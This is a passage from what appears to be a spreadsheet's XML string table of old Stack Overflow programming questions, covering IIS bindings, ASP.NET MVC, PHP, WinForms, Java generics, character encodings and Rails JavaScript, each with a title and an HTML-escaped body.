&lt;li&gt;&lt;code&gt;example1.com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;example2.com&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;example3.com&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The site bindings for each:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://img371.imageshack.us/img371/4215/example1pf4.gif" alt="IIS 7.0 Site Bindings example1.com" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="http://img371.imageshack.us/img371/2567/example2xx0.gif" alt="IIS 7.0 Site Bindings example2.com" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="http://img266.imageshack.us/img266/8186/example3rh9.gif" alt="IIS 7.0 Site Bindings example3.com" /&gt;&lt;/p&gt;
&lt;p&gt;When I navigate to &lt;code&gt;example1.com&lt;/code&gt;, then I see my &lt;em&gt;example1&lt;/em&gt; web site.&lt;/p&gt;
&lt;p&gt;When I navigate to &lt;code&gt;example2.com&lt;/code&gt;, then I see my &lt;em&gt;example2&lt;/em&gt; web site.&lt;/p&gt;
&lt;p&gt;But, when I navigate to &lt;code&gt;example3.com&lt;/code&gt;, I see my &lt;em&gt;example1&lt;/em&gt; web site--not the &lt;em&gt;example3&lt;/em&gt; web site I expect.&lt;/p&gt;
&lt;p&gt;What's going on?  Why might &lt;code&gt;example2.com&lt;/code&gt; work, but &lt;code&gt;example3.com&lt;/code&gt; fail?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;del&gt;Issue resolved!&lt;/p&gt;
&lt;p&gt;I removed and then recreated the &lt;em&gt;example3.com&lt;/em&gt; web site within IIS and it's now working.&lt;/p&gt;
&lt;p&gt;I didn't change anything.  It either originally had a simple typo or the act of recreating it just happened to fix a hiccup within IIS.&lt;/del&gt;&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;del&gt;It's stopped working again after I setup additional redirects within IIS forcing web sites to use sub domains:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;http://example1.com/&lt;/code&gt; redirects to &lt;code&gt;http://www.example1.com/&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I've again removed and then recreated the &lt;em&gt;example3.com&lt;/em&gt; web sites; I've reset IIS; I've rebooted the server.  It's still not working correctly.&lt;/del&gt;&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;I've figured it out.  It's not an IIS issue.  It's a DNS issue.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;example3.com&lt;/code&gt; traffic is for some reason directed to a web server at a different company. THEY serve up a page with only an HTML frame on it.  That frame loads a page with the address &lt;code&gt;http://example3.example1.com&lt;/code&gt;.  That's what I need to handle on MY web server.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Asp.Net MVC Beta: Previous RouteData overrides current RouteData?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have something similar to the following method: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public ActionResult Details(int id)
    {
        var viewData = new DetailsViewData
        {
            Booth = BoothRepository.Find(id),
            Category = ItemType.HotBuy
        };
        return View(viewData);
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and the following Route:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;routes.MapRoute("shows","shows/{controller}/{action}/{id}", new {id = 0});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Everything worked fine before the Beta, when I had Preview 3. Now the method will fill the id correctly the first time I execute the action. However the second time the controller's &lt;code&gt;ModelState&lt;/code&gt; contains the last-use id value. This causes the &lt;code&gt;ActionInvoker&lt;/code&gt; to use it in the method's parameter instead of the &lt;code&gt;Route&lt;/code&gt; value.&lt;/p&gt;
&lt;p&gt;So if I call the action twice on two different entities the results are such:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;www.mysite.com/shows/Booth/Details/1  =&amp;gt; Details(1)
www.mysite.com/shows/Booth/Details/2  =&amp;gt; Details(1)  //from ModelState["id"]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;From my quick scan with Reflector it seems it first binds parameters to the ModelState then to Routes. However, I never even posted anything from the model. As far as I can tell the ModelState should not contain anything. &lt;/p&gt;
&lt;p&gt;Is this a bug in the Beta, possibly a bug somewhere in my code, or is there some design feature that I am ignorant of? Any insight into the nature of ModelState and why this happens is appreciated.&lt;/p&gt;
&lt;p&gt;EDIT: 
 I discovered that this issue is actually a symptom of what appears to be a bug with the DefaultValueProvider if you instantiate a Controller from an IoC container that exists for the lifetime of the Asp.Net application.What happens is that the DefaultValueProvider uses the first ControllerContext given to the Controller and never updates it until the controller is recreated. This causes old RouteData to be used for method parameters instead of the current RouteData.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Option Strict On and .NET for VB6 programmers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm preparing a class on Visual Basic 2005 targeting Visual Basic 6 programmers migrating to the .NET platform.&lt;br /&gt;&lt;br/&gt;
I would like a word of advice about whether to recommend them to always enable &lt;strong&gt;Option Strict&lt;/strong&gt; or not.&lt;br /&gt;&lt;br/&gt;
I've worked exclusively with C-style programming languages, mostly Java and C#, so for me &lt;strong&gt;explicit casting&lt;/strong&gt; is something I always expect I have to do, since it's never been an option.&lt;br/&gt;However I recognize the value of working with a language that has built-in support for &lt;strong&gt;late-binding&lt;/strong&gt;, because not having to be excessively explicit about types in the code indeed saves time. This is further proved by the popular diffusion of &lt;strong&gt;dynamic typed languages&lt;/strong&gt;, even on the .NET platform with the Dynamic Language Runtime.
&lt;br&gt;&lt;br/&gt;
With this in mind, should someone who is approaching .NET for the first time using VB.NET and with a VB6 background be encouraged to get into the mindset of &lt;strong&gt;having to work with compile-time type checking&lt;/strong&gt; because that's the "best practice" in the CLR? Or is it "OK" to continue enjoying the benefits of late-binding?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How should I manage developing on SQL Server 2008 and SQL Server 2005 for different clients?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The company I work for has several clients. I'm currently splitting my time between 2 .net projects.  For Client A I need Visual Studio 2008, SQL Server 2008 and the 3.5 framework. For Client B 2005 versions/2.0 Framework.&lt;/p&gt;
&lt;p&gt;Others in the company are using Microsoft Virtual PC to keep the development environments separate.&lt;/p&gt;
&lt;p&gt;What do you suggest?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Additional Info:&lt;/strong&gt;
The main benefit I see is that you are able to share your virtual machine setup with anyone.  This allows a new developer to step right in on a project without spending half a day setting up the new development environment and all its idiosyncrasies.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to script Visual Studio 2008 from Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to write Python scripts that drive Visual Studio 2008 and Visual C++ 2008.  All the examples I've found so far use &lt;code&gt;win32com.client.Dispatch&lt;/code&gt;.  This works fine for Excel 2007 and Word 2007 but fails for Visual Studio 2008:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import win32com.client
app1 = win32com.client.Dispatch( 'Excel.Application' ) # ok
app2 = win32com.client.Dispatch( 'Word.Application' )  # ok
app3 = win32com.client.Dispatch( 'MSDev.Application' ) # error
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any ideas?  Does Visual Studio 2008 use a different string to identify itself?  Is the above method out-dated?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Effective copying multiple files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to copy quite a lot of files from one folder to another. Currently I am doing it in this way:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;string[] files = Directory.GetFiles(rootFolder, "*.xml");
foreach (string file in files)
{
    string otherFile = Path.Combine(otherFolder, Path.GetFileName(file));
    File.Copy(file, otherFile);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is that the most efficient way? Seems to take ages.&lt;/p&gt;
&lt;p&gt;EDIT: I am really asking if there is a faster way to do a batch copy, instead of copying individual files, but I guess the answer is no.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to check for optional fields in $_POST</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;At the moment my code looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Assign values for saving to the db
$data = array(
    'table_of_contents' =&amp;gt; $_POST['table_of_contents'],
    'length' =&amp;gt; $_POST['length']
);
# Check for fields that may not be set
if ( isset($_POST['lossless_copy']) )
{
   $data = array(
       'lossless_copy' =&amp;gt; $_POST['lossless_copy']
    );
}
// etc.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This would lead to endless if statements though... Even with the ternary syntax it's still messy. Is there a better way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should I use multi-byte overloading (mbstring.func_overload)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm in the process of making my PHP site Unicode-aware. I'm wondering if anyone has experience with the &lt;code&gt;mbstring.func_overload&lt;/code&gt; setting, which replaces the normal string functions (e.g. &lt;code&gt;strlen&lt;/code&gt;) with their multi-byte equivalents (&lt;code&gt;mb_strlen&lt;/code&gt;). There aren't any comments on the PHP manual page.&lt;/p&gt;
&lt;p&gt;Are there any potential problems that I should be aware of? Any cases where calling the multi-byte version is a bad idea?&lt;/p&gt;
&lt;p&gt;I suppose one example would be functions that deal with encryption, since they may expect to deal with strings of bytes, rather than strings of characters.&lt;/p&gt;
&lt;p&gt;Also, the manual page includes a note: "It is not recommended to use the function overloading option in the per-directory context, because it's not confirmed yet to be stable enough in a production environment and may lead to undefined behaviour."&lt;/p&gt;
&lt;p&gt;Does that mean that it's not stable in a per-directory context, or it's generally not stable? The wording is unclear.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET PasswordRecovery Control with Localized content</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on a simple portal application using the ASP.NET membership and login controls. I would like to use the PasswordRecovery control to send emails containing forgotten passwords, however my portal requires localization. I have an existing Content Management System that I am pulling the localized strings out of and I would like to link the PasswordRecovery control to that system.&lt;/p&gt;
&lt;p&gt;But, it appears that the PasswordRecovery control will ONLY accept a .txt file for the email body...the property is PasswordRecovery1.MailDefinition.BodyFileName&lt;/p&gt;
&lt;p&gt;I do not want to use a file on disk, I would like to use the localized content in my CMS.&lt;/p&gt;
&lt;p&gt;Is there any way to do this? It occurred to me that I might be able to use the SendingMail event to send my OWN email through the normal System.Net namespace, but that seems sorta cludgy...&lt;/p&gt;
&lt;p&gt;Any thoughts?&lt;/p&gt;
&lt;p&gt;Thanks,
Max&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get the new value of an HTML input after a keypress has modified it?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an HTML input box&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;input type="text" id="foo" value="bar"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've attached a handler for the '&lt;em&gt;keyup&lt;/em&gt;' event, but if I retrieve the current value of the input box during the event handler, I get the value as it was, and not as it will be!&lt;/p&gt;
&lt;p&gt;I've tried picking up '&lt;em&gt;keypress&lt;/em&gt;' and '&lt;em&gt;change&lt;/em&gt;' events, same problem. &lt;/p&gt;
&lt;p&gt;I'm sure this is simple to solve, but at present I think the only solution is for me to use a short timeout to trigger some code a few milliseconds in the future!&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Is there anyway to obtain the current value during those events?&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;EDIT: looks like I had a caching problem with my js file as I checked the same code later on and it worked just fine. I would delete the question, but not sure if that loses rep for the kind folk who posted ideas :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Insert cell comments in excel programmaticaly</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's the better way to insert cell comments in excel 2007 files programmaticaly using c# and .net 3.5?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Class will compile for Tests/Console but not in Asp.net application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a simple interface:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public interface IVisitorsLogController  
{
    List&amp;lt;VisitorsLog&amp;gt; GetVisitorsLog();
    int GetUniqueSubscribersCount();
    int GetVisitorsCount();
    string GetVisitorsSummary();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the class VisitorsLogController implements this interface.&lt;/p&gt;
&lt;p&gt;From a console application or a TestFixture - no problem - the console/test fixture compile perfectly.&lt;/p&gt;
&lt;p&gt;However, from an Asp.Net web site (not application) in the same solution with this code in the code behind&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private IVisitorsLogController ctl;
protected int GetUniqueMembersCount()
{
    ctl = new VisitorsLogController();
    return ctl.GetUniqueSubscribersCount();        
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the compiler throws this exception:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Error 1	'WebSiteBusinessRules.Interfaces.IVisitorsLogController'
  does not contain a definition for
  'GetUniqueSubscribersCount' and no
  extension method
  'GetUniqueSubscribersCount' accepting
  a first argument of type
  'WebSiteBusinessRules.Interfaces.IVisitorsLogController'
  could be found (are you missing a
  using directive or an assembly
  reference?)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;yet for this code in the same file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  protected static int GetVisitorsCount()
{
    return VisitorsLogController.Instance.GetVisitorsCount(DateTime.Today);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the compiler compiles these lines without complaining. In fact if I add anything new to the Interface the compiler now complains when trying to compile the asp.net page.&lt;/p&gt;
&lt;p&gt;It can't be a missing using directive or assembly reference otherwise both methods would fail.&lt;/p&gt;
&lt;p&gt;This is driving me nuts!&lt;/p&gt;
&lt;p&gt;Any thoughts please?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Jeremy&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Corel draw 13 mysql query</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to do a mysql database query in Corel Draw 13(X3)? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Want to host WCF Webservice as Windows Service as against to Hosting in IIS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to expose few web services but thinking of hosting those as Windows Service as against hosting in IIS.&lt;/p&gt;
&lt;p&gt;Is it a good practice? &lt;/p&gt;
&lt;p&gt;If yes? How do I make it secured? &lt;/p&gt;
&lt;p&gt;I want to authenticate the users who are accessing it (against our custom security database and also want to make sure that the request is originating from our business partner (X.509 certificates???? not worked much with this).&lt;/p&gt;
&lt;p&gt;appreciate your pointers in this regards.&lt;/p&gt;
&lt;p&gt;Thanks &amp;amp; Regards,
Ajay&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How Do You Get the Height of the Titlebar Using Java (Swing)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am getting a &lt;code&gt;MouseEvent&lt;/code&gt; in Java.  the &lt;code&gt;getPoint()&lt;/code&gt; method is adding the height of the title bar into the y portion of the coordinate.&lt;/p&gt;
&lt;p&gt;I was wondering how I can find the height of the title bar of the current window in order to offset the y value by the correct amount.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Scalability on the web</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been arguing with some friends on the university, and we can't get to a point to which is the framework with more scalability for web applications (and still very fast).&lt;/p&gt;
&lt;p&gt;One calls for jsp, the other one for ruby other for php and so on. Could i ask you to clarify us on what as more scalability potential?&lt;/p&gt;
&lt;p&gt;Tks, hope I'm not duplicating anything I've searched but didn't found any previous question like this.&lt;/p&gt;
&lt;p&gt;Edit: If you could point a comparison about this it would be good :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What methods do wikis use for merging concurrent edits?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If two users edit the same wiki topic, what methods have been used in wikis (or in similar collaborative editing software) to merge the second user's edits with the first?&lt;/p&gt;
&lt;p&gt;I'd like a solution that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;doesn't require locking&lt;/li&gt;
&lt;li&gt;doesn't lose any additions to the page.&lt;/li&gt;
&lt;li&gt;It may add extra "boilerplate" text to indicate where differing changes were made.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;(I'm interested in a solution that could be used to implement &lt;a href="http://stackoverflow.uservoice.com/pages/general/suggestions/28245" rel="nofollow"&gt;this uservoice idea&lt;/a&gt; for stack overflow.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Database of Software</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a database of commonly installed Windows software. At minimum I need the name of the software and the executable name, but it'd also be nice to have the publisher and the common installation path, etc. Basically, I'd like to be able to query it to find all the software by Adobe and the associated executable name, etc. &lt;/p&gt;
&lt;p&gt;Basically I'm looking to be able to do &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * FROM Software WHERE Publisher = 'Microsoft' 
SELECT * FROM Software WHERE Executable = 'devenv.com'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I came across an effort to create such a database a long time ago, but can't seem to find it now. Maybe it fizzled out. Any help would be greatly appreciated. Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I view more than one version of IE on my computer?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Where I work we only have IE 7. I want to view  IE 6 on my computer also. &lt;/p&gt;
&lt;p&gt;How can I view both on the same computer? &lt;/p&gt;
&lt;p&gt;I want more than just a screen shot. I want to view both versions of IE as I write code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Append newline to flat-file schema in BizTalk 2006 R2</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a flat-file schema that has a header and detail records. It looks something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HDR**2401*XX0062484*22750***20081006000000*000*******
LIN**001*788-0538-001*4891-788538010*20000*EA**0000***
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I need to append two blank lines at the end of the message. Right now, if I have multiple records I get the following output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HDR**2401*XX0062484*22750***20081006000000*000*******
LIN**001*788-0538-001*4891-788538010*20000*EA**0000***
HDR**2401*XX0062484*22750***20081006000000*000*******
LIN**001*788-0538-001*4891-788538010*20000*EA**0000***
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What I want to see happen is something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HDR**2401*XX0062484*22750***20081006000000*000*******
LIN**001*788-0538-001*4891-788538010*20000*EA**0000***
HDR**2401*XX0062484*22750***20081006000000*000*******
LIN**001*788-0538-001*4891-788538010*20000*EA**0000***
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I could build a custom pipeline component to do this, but I'm wondering if there is a simpler way of getting what I need?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WinForms: How to customize a tooltip when it is about to be shown?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i want to have a tooltip for each item in a treeview, and each item in a listview, and different for each subitem (i.e. column) in the listview.&lt;/p&gt;
&lt;p&gt;i can determine the text i want to show (using hit testing with the current mouse position, etc):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private void toolTip1_Popup(object sender, PopupEventArgs e)
{
   if (e.AssociatedControl == listView1)
   {
      toolTip1.SetToolTip(listView1, "foo");
   }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but any attempt to set the tooltip text causes a &lt;a href="http://stackoverflow.com" rel="nofollow"&gt;stackoverflow&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;How can i customize the tooltip (icon, title, text) just before it appears?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>mdi app with multiple GUI threads</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;C# MDI application with separate GUI threads for each child in MDI is that possible ?&lt;/p&gt;
&lt;p&gt;For example if one of the child forms is blocked by some synchronous request it  freezes the entire container ( MDI Parent ) and the other windows open also become in accessible.&lt;/p&gt;
&lt;p&gt;In general , is it possible to have more than one GUI thread in .net windows form app domain ?&lt;/p&gt;
&lt;p&gt;In visual studio default winform application has &lt;strong&gt;STA&lt;/strong&gt; ( single threaded apartment ) setup.
In theory I understand what &lt;strong&gt;MTA&lt;/strong&gt; means here but what is the practical use of it.&lt;/p&gt;
&lt;p&gt;In my use case the individual mdi child are developed by various teams who may not defer blocking calls in an async manner , so I am just wondering if its possible to have multiple UI threads , although its not advisable - I completely agree.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;edit #1:&lt;/strong&gt; &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;I can think of google chrome browser as an
  example where individual tab is a
  separate process probably with a
  dedicated GUI thread ? Is something
  like this possible in a dot.net app.&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>How does GB18030 differ from Unicode?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How does the Chinese GB18030 code set differ from Unicode?&lt;/p&gt;
&lt;p&gt;What special techniques are required for handling GB18030?&lt;/p&gt;
&lt;p&gt;Are there any (open source) libraries for handling GB18030?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the major drawbacks to using OpenOffice DB vs. Microsoft Access?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know that Open Office Database uses a java database backend. Does anyone have any insight on how this compares to the Jet Database Engine? &lt;/p&gt;
&lt;p&gt;Also is the query designer/reporting nearly as robust as MS Access?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Checking for duplicates in a complex object using Linq or Lamda expression</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've just started learning linq and lamda expressions, and they seem to be a good fit for finding duplicates in a complex object collection, but I'm getting a little confused and hope someone can help put me back on the path to happy coding.&lt;/p&gt;
&lt;p&gt;My object is structured like list.list.uniqueCustomerIdentifier&lt;/p&gt;
&lt;p&gt;I need to ensure there are no duplicate uniqueCustomerIdentifier with in the entire complex object. If there are duplicates, I need to identify which are duplicated and return a list of the duplicates.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>HTML encode user input when storing or when displaying</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Simple question that keeps bugging me.&lt;/p&gt;
&lt;p&gt;Should I HTML encode user input right away and store the encoded contents in the database, or should I store the raw values and HTML encode when displaying?&lt;/p&gt;
&lt;p&gt;Storing encoded data greatly reduces the risk of a developer forgetting to encode the data when it's being displayed. However, storing the encoded data will make datamining somewhat more cumbersome and it will take up a bit more space, even though that's usually a non-issue.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Saving/Organizing/Searching Outlook E-mail outside of Outlook</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My company requires me to use Outlook for my E-mail.  Outlook does virtually nothing the way I want to do it and it frustrates me greatly.  (I'm not trying to start a flame war here, it must do exactly what thousands of CEO's want it to do, but I'm not a CEO.)&lt;/p&gt;
&lt;p&gt;I would like to be able to automatically extract the thousands of E-mails and attachments currently in my Outlook account and save them in my own alternative storage format where I can easily search them and organize them the way I want.  (I'm not requesting suggestions for the new format.)&lt;/p&gt;
&lt;p&gt;Maybe some nice open source program already can do this... that would be great.  Please let me know.&lt;/p&gt;
&lt;p&gt;Otherwise, &lt;b&gt;how can I obtain the message content and the attachments without going through the huge collection manually?&lt;/b&gt;  Even if I could only get the message content and the names of the attachments, that would be sufficient.  Is there documentation of the Outlook mail storage format?  Is there a way to query Outlook for the data?&lt;/p&gt;
&lt;p&gt;Maybe there is an alternative approach I haven't considered?&lt;/p&gt;
&lt;p&gt;My preferred language to do this is C#, but I can use others if needed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to detect the current sharepoint pages from the client machine?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On the client machine I need to be able to somehow detect which sites the current user are looking at right now.
I know the base URL of the sharepoint app, say sharepoint.thecompany.net but how the hack do I get the last requested url from the server?
I have hit a dead stop when trying to iterate the current processes and the casting the iexplorer process to something I can work with, I just don't know which kind of object to cast the process to :-(&lt;/p&gt;
&lt;p&gt;I hope to implement this logic in a C# assembly what should run on the client box.&lt;/p&gt;
&lt;p&gt;Any other approach that might work?&lt;/p&gt;
&lt;p&gt;Thanks in advance&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java generics - returning subtype of declared type from method</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My class is implementing a super-class method which which returns &lt;code&gt;List&amp;lt;JComponent&amp;gt;&lt;/code&gt;.  The list being returned is read-only:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public abstract class SuperClass {
    public abstract List&amp;lt;JComponent&amp;gt; getComponents();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In my class, I want to return a field which is declared as List - i.e. a sub-list:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class SubClass extends SuperClass {
    private List&amp;lt;JButton&amp;gt; buttons;
    public List&amp;lt;JComponent&amp;gt; getComponents() {
        return buttons;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This generates a compiler error, as &lt;code&gt;List&amp;lt;JButton&amp;gt;&lt;/code&gt; is not a subtype of &lt;code&gt;List&amp;lt;JComponent&amp;gt;&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I can understand why it doesn't compile, as it shouldn't be allowed to add a JTextField to a List of JButtons.&lt;/p&gt;
&lt;p&gt;However, as the list is read-only, then "conceptually" this should be allowed.  But, of course, the compiler doesn't know that it is read-only.&lt;/p&gt;
&lt;p&gt;Is there any way to achieve what I want to achieve, without changing the method declaration in the super-class, and the field declaration in the sub-class?&lt;/p&gt;
&lt;p&gt;Thanks,
Calum&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# - Optimising binary serialization for multi-dimensional generic arrays</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a class that I need to binary serialize. The class contains one field as below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private T[,] m_data;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;These multi-dimensional arrays can be fairly large (hundreds of thousands of elements) and of any primitive type. When I tried standard .net serialization on an object the file written to disk was large and I think .net is storing a lot of repeated data about element types and possibly not as efficiently as could be done.&lt;/p&gt;
&lt;p&gt;I have looked around for custom serializers but have not seen any that deal with multi-dimensional generic arrays. I have also experimented with built-in .net compression on a byte array of the memory stream following serializing with some success, but not as quick / compressed as I had hoped.&lt;/p&gt;
&lt;p&gt;My question is, should I try and write a custom serializer to optimally serialize this array for the appropriate type (this seems a little daunting), or should I use standard .net serialization and add compression?&lt;/p&gt;
&lt;p&gt;Any advice on the best approach would be most appreciated, or links to resources showing how to tackle serialization of a multi-dimensional generic array - as mentioned &lt;a href="http://www.codeproject.com/KB/dotnet/FastSerializer.aspx"&gt;existing examples&lt;/a&gt; I have found do not support such structures.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do .NET sites hide .aspx extension of their files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm pretty sure stackoverflow.com is created with ASP.NET, but no matter where I click I see no .aspx extension in the address bar.
How it is done and is there a particular reason for this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I relax PHP's open_basedir restriction?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://www.php.net/features.safe-mode"&gt;open_basedir&lt;/a&gt; limits the files that can be opened by PHP within a directory-tree.&lt;/p&gt;
&lt;p&gt;I am storing several class libraries and configuration files outside of my web root directory.  This way the web server does not make them publicly accessible.  However when I try to include them from my application I get an open_basedir restriction error like this:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Warning: realpath()
  [function.realpath]: open_basedir
  restriction in effect.
  File(/var/www/vhosts/domain.tld/zend/application)
  is not within the allowed path(s):
  (/var/www/vhosts/domain.tld/httpdocs:/tmp)
  in
  /var/www/vhosts/domain.tld/httpdocs/index.php
  on line 5&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;My web root is here:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/var/www/vhosts/domain.tld/httpdocs
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My libraries and configuration directory are here:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/var/www/vhosts/domain.tld/zend
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What would be the best workaround to relax the open_basedir restriction so that the the directory tree under the domain folder becomes available to my application?  I have a number of domains that I want to do this with, and I'm also obviously wary of creating security vulnerabilities.&lt;/p&gt;
&lt;p&gt;Note: I am using CentOS, Apache, Plesk, and I have root ssh access to the server. And though this doesn't apply to Zend Framework directly, I am using it in this instance.  So here is the inclusion from Zend's bootstrap:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;define('APPLICATION_PATH', realpath(dirname(__FILE__) . '/../zend/application/'));
set_include_path(APPLICATION_PATH . '/../zend/library' . PATH_SEPARATOR . get_include_path());
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How much JavaScript do you let Rails generate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ruby on Rails has a lot of ways to generate JavaScript. Particularly when it comes to Ajax. Unfortunately, there are a few problems that I often see with the JavaScript that it generates. &lt;/p&gt;
&lt;ul&gt;
